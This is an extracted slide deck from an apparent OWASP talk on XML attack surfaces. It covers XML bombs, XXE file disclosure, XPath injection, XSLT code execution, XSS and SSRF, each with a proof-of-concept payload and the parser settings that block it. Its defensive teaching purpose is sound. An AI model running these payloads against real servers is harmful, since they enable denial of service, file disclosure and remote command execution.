XML Attack Surface - Pierre Ernst (OWASP Ottawa)

OWASP

XML Attack Surface

Business Analytics Security Competency Group

Pierre Ernst, 2013

OWASP

XML is Pervasive

Pierre Ernst, 2013 2/32

OWASP

XML intro
■ Born in 1998 (see initial specifications)
■ Data interchange format
– International languages support
– Text based
– Human readable
■ Parsers
– DOM
– SAX, rooted in Ottawa (see bio)
– StAX
■ Complementary technologies and standards
– XML Validation (DTD, XSD, ...)
– XML Transformation (XSLT)
Pierre Ernst, 2013
– XML Query (XQuery, XPath) 3/32

OWASP

Is XML Secure?

■ Nothing wrong with the standard itself
■ Most vulnerabilities due to
– Libraries/Tools misconfiguration
– Insufficient validation of untrusted input

known, reported security vulnerabilities (see CVE search)


OWASP

XML Bomb
■ CWE-776: Denial of service (memory exhaustion)
■ Amit Klein, 2002 (see BugTraq)
■ XML entity expansion
<!DOCTYPE ibm [
<!ENTITY ernst128 "pierre">
<!ENTITY ernst127 "&ernst128;&ernst128;">
...
]>
<ibm>&ernst000;</ibm>


OWASP

Modus Operandi

Attacker Vulnerable Server 2
POST /request HTTP/1.1 <ibm>&ernst001;&e
<ibm>&ernst000;</
<ibm>&ernst002;&e
<ibm>&ernst003;&e
rnst001;</ibm>
ibm>
rnst002;&ernst002
rnst003;&ernst003
1 ;&ernst002;</ibm>
;&ernst003;&ernst
003;&ernst003;&er
nst003;&ernst003;
</ibm>


OWASP

Demo #1: Server Crash with XML Bomb

(Source code available on demand)


OWASP

Variation: “Quadratic Blowup Attack”
■ Amit Klein (see MSDN article)
■ Uses one single entity of size 50KB
■ Reference the entity 50,000 times
■ Useful to bypass
FEATURE_SECURE_PROCESSING protection
– Limits entity expansions to
• 100,000 (IBM)
• 64,000 (Oracle)
<!DOCTYPE pierre [
<!ENTITY e "eeeeeeeeeeee...eeeeeeeee">
]>
<pierre>&e;&e;&e;...&e;&e;&e;</pierre>


OWASP

Protection

DOM SAX StAX
factory.setFeature("http://apache.org factory.setPropert
/xml/features/disallow-doctype-decl", y(XMLInputFactory.
true); IS_REPLACING_ENTIT
Y_REFERENCES,
false);


OWASP

External Entity Reference (XXE)
■ CWE-611: Information Disclosure
■ Gregory Steuck, 2002 (see BugTraq)
■ Requires the server to include user-supplied data in
the response

<!DOCTYPE pierre [
<!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<pierre>&ernst;</pierre>


OWASP

Modus Operandi

Attacker Vulnerable Server
POST /request HTTP/1.1 2
<pierre>[...
<pierre>
1 content of the
&ernst;
file on the
</pierre>
server...]</pierr
e>
3
HTTP/1.1 200 OK
Content-Type: text/xml

<response>
Unknown service [...
content of the file on
the server...]
Pierre Ernst, 2013 </response> 11/32

OWASP

Demo #2: File Content Disclosure with XXE



OWASP

Protection

DOM SAX StAX
factory.setFeature("http://apache.org factory.setPropert
/xml/features/disallow-doctype-decl", y(XMLInputFactory.
true); IS_REPLACING_ENTIT
Y_REFERENCES,
false);


OWASP

Blind Xpath Injection (“XML Injection”)
■ CWE-643: Abuse of Functionality
■ Amit Klein, 2004 (see white-paper)
■ User input is embedded as-is in Xpath statement
<users>
<user>
<name>pierre</name>
<password>i8simon</password> ''oror ''=''
pierre
'pierre'
' ''='
</user>
<user> 'i8simon'
***********
<name>trevor</name> '' or ''=''
<password>mee2</password>
</user>
</users>

//users/user[name/text()=
and password/text()= ]/name/text()

OWASP

Modus Operandi

Attacker Vulnerable Server 2
POST /login HTTP/1.1
//users/user[name/
text()=
1 '' or ''='' and
password/text()=
'' or ''='']
/name/text()
pierre
3 trevor

HTTP/1.1 200 OK
Content-Type: text/html


OWASP

Demo #3: Blind Xpath Injection



OWASP

Variation: Read System Properties

■ JAXP implementation:
–IBM
–Oracle
■ Interesting properties:
–os.version
–user.name
–java.class.path
–sun.java.command
system-property('sun.java.command')


OWASP

Protection

■ Input Validation.
■ “[A-Za-z0-9_-]+” in our example.


OWASP

Code Injection during XSLT
■ CWE-94: Improper Control of Generation of Code
■ When the attacker can control the XML style sheet
applied to an XML document.
■ Uses transformer engine extension capabilities
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="xalan://java.lang.Runtime"
exclude-result-prefixes="rt">
<xsl:template match="/">
<xsl:variable name="obj" select="rt:getRuntime()"/>
<xsl:value-of select="rt:exec($obj,'calc.exe')"/>
</xsl:template>
</xsl:stylesheet>


OWASP

Modus Operandi <doc>
whatever
</doc>
<stylesheet>
malicious
</stylesheet>
Attacker Vulnerable Server

GET /request?doc=...&stylesheet=... HTTP/1.1

1
2

3
Load class java.lang.Runtime
Call exec() method


OWASP

Demo #4: Remote OS Command Injection



OWASP

Variation #1: Universal XXE
● “Universal”: you always see the entity in the response

<!DOCTYPE xsl:stylesheet [
<!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

&ernst;
</xsl:template>

</xsl:stylesheet>


OWASP

Variation #2: Infinite Loop

xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template name="loop"> 2
<xsl:call-template name="loop"/>
</xsl:template>
1
<xsl:call-template name="loop"/>
</xsl:template>
</xsl:stylesheet>


OWASP

Variation #3: Cross-Site Scripting (XSS)

xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:xhtml="http://www.w3.org/1999/xhtml">

<xsl:output method="html"/>

<xhtml:script>alert('XSS');</xhtml:script>
</xsl:template>

</xsl:stylesheet>


OWASP

Protection

■ Several ways to abuse XML Stylesheet Transforms.
■ Users should never been able to use custom XML
stylesheets.


OWASP

Server Side Request Forgery (SSRF)

■ CWE-601: Open Redirect, but server-to-server
■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)
■ XML vectors:
– Xml eXternal Entities (XXE)
– Xinclude
– External Doctype inclusion:
<!DOCTYPE PIERRE PUBLIC "ernst"
"http://intranet:666/start-armageddon">

<pierre/>


OWASP

Modus Operandi

Attacker Vulnerable Server Internal Service

1
POST /request HTTP/1.1
Content-Type: application/xml
Content-Lenght: 666

<?xml version=”1.0”?> whatever
2
...


OWASP

Protection

DOM SAX StAX
factory.setFeature("http://apache.org/ factory.setPropert
xml/features/disallow-doctype-decl", y(XMLInputFactory.
true); SUPPORT_DTD,
false);


OWASP

Variation: Exotic Java URL Handlers
■ {Alexander Polyakov, Dmitry Chastukhin, Alexey
Tyurin}, 2012 (CVE-2012-5085)


OWASP

Conclusions
■ Always configure your XML parsers to disallow
Doctype.
–From a server's perspective, clients should not be
able to define the grammar of the request
anyway
–Secure Processing Flag is not enough
–Preventing external entity expansion is not
enough
■ XPath: validate user's input
■ XSLT: avoid at any cost
■ Always apply Java patches from vendors

OWASP

Pierre Ernst
■ 10 years as Software Developer
■ 5 years as Penetration Tester
– 750+ vulns
– Manual Code Review
– Manual Black Box Testing
– Java, XML, Open Source, …

http://ca.linkedin.com/in/pernst
https://twitter.com/e_rnst

pierre.ernst@gmail.com

OWASP

Questions & Answers


XML Attack Surface - Pierre Ernst (OWASP Ottawa)

More Related Content

Viewers also liked (14)

Similar to XML Attack Surface - Pierre Ernst (OWASP Ottawa) (20)

XML Attack Surface - Pierre Ernst (OWASP Ottawa)